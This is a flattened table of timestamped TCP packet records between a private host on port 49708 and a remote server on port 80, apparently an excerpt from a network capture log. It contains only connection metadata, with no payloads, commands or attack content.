                                                        Dec 31, 2024 09:28:28.122198105 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.122208118 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.122217894 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.122229099 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.122246981 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.122271061 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.122317076 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.122328043 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.122339964 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.122368097 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.122380018 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.122454882 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.122466087 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.122476101 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.122484922 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.122494936 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.122504950 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.122513056 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.122529030 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.122538090 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.122548103 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.122554064 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.122565985 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.122575998 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.122586012 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.122592926 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.122627020 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.123066902 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.123078108 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.123085022 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.123090982 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.123141050 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.123155117 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.123166084 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.123176098 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.123195887 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.123210907 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.123254061 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.123265982 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.123275995 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.123287916 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.123301029 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.123325109 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.123383999 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.123410940 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.123428106 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.123439074 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.123450994 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.123461008 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.123471022 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.123615026 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.123625040 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.123636007 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.123647928 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.123652935 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.123661041 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.123671055 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.123681068 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.123691082 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.123708963 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.123725891 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.123744965 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.123755932 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.123765945 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.123776913 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.123790979 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.123796940 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.123816967 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.125355005 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.125365973 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.125376940 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.125408888 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.125413895 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.125425100 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.125437021 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.125443935 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.125472069 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.125500917 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.125511885 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.125526905 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.125535965 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.125549078 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.125559092 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.125638008 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.125648975 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.125663996 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.125675917 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.125680923 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.125690937 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.125698090 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.125708103 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.125718117 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.125735998 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.125785112 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.275062084 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.279939890 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.279959917 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.279973030 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.279984951 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.279997110 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280019045 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.280069113 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.280105114 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280117035 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280128002 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280138016 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280150890 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.280157089 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280164003 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.280173063 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280186892 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280193090 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.280203104 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280224085 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280235052 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.280272007 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.280297041 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280308962 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280318975 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280339003 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.280426025 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280436993 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280447960 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280457973 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280468941 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.280474901 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280486107 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280493975 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.280504942 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280512094 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.280535936 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.280561924 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280572891 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280586958 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280596972 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280606031 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280617952 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.280644894 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.280704975 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280718088 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280730963 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280740976 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280747890 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.280756950 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280765057 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.280775070 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280786037 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280796051 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.280802965 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280822992 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280828953 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.280858994 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.280951977 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280963898 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.280975103 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281003952 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.281122923 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281133890 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281151056 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281161070 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.281167984 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281178951 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281186104 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.281196117 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281213999 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.281219006 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281229019 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281234980 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281239986 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281255960 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281269073 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.281296015 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.281358957 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281369925 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281380892 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281392097 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281403065 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281415939 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281420946 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.281476021 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.281476021 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.281497955 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281507969 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281518936 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281539917 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.281555891 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281567097 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281578064 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281598091 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.281626940 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.281722069 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281739950 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281749964 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281780005 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.281940937 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281951904 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281963110 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281974077 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.281979084 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.281990051 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282000065 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282015085 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.282025099 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282033920 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.282054901 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282063961 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.282072067 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282087088 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282104969 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282110929 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.282119989 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282130957 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282140017 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282149076 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.282157898 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282167912 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.282196999 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.282211065 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282222033 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282254934 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.282313108 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282324076 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282334089 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282345057 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282355070 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282367945 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282373905 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.282382965 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282397985 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282403946 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.282413006 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.282421112 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282468081 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.282497883 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282514095 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282546043 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.282665968 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282675982 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282687902 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282707930 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.282726049 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.282847881 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282859087 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282871962 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282881975 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282892942 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282903910 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282912016 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.282922029 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.282933950 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.282951117 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.282998085 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283009052 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283025980 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283036947 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283046007 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283055067 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.283065081 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283077955 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.283083916 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283094883 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283123016 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.283135891 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283152103 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283163071 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283185959 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.283201933 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.283310890 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283329010 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283345938 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283358097 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283364058 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283410072 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.283431053 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283438921 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.283447981 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283461094 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283472061 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.283503056 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.283559084 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283580065 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283591032 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283601999 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283612013 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283622980 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.283629894 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283648014 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.283663988 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.283708096 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283719063 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283729076 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283739090 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283756018 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283762932 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.283772945 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283786058 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283791065 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.283803940 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283809900 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.283821106 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283832073 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.283839941 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.283865929 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.284027100 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284039974 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284055948 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284065962 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284079075 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284085035 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.284097910 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284106016 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.284117937 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284141064 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.284276962 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284287930 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284305096 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284315109 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.284347057 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.284449100 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284463882 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284475088 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284486055 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284502029 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.284509897 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284522057 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284539938 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284548044 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.284557104 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284568071 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.284579992 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284591913 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.284596920 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284607887 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284617901 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284629107 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284636021 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.284651995 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.284681082 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284693003 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284709930 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284719944 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284729958 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.284748077 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284755945 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.284786940 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:28.284909010 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284920931 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:28.284931898 CET804970887.120.113.91192.168.2.8
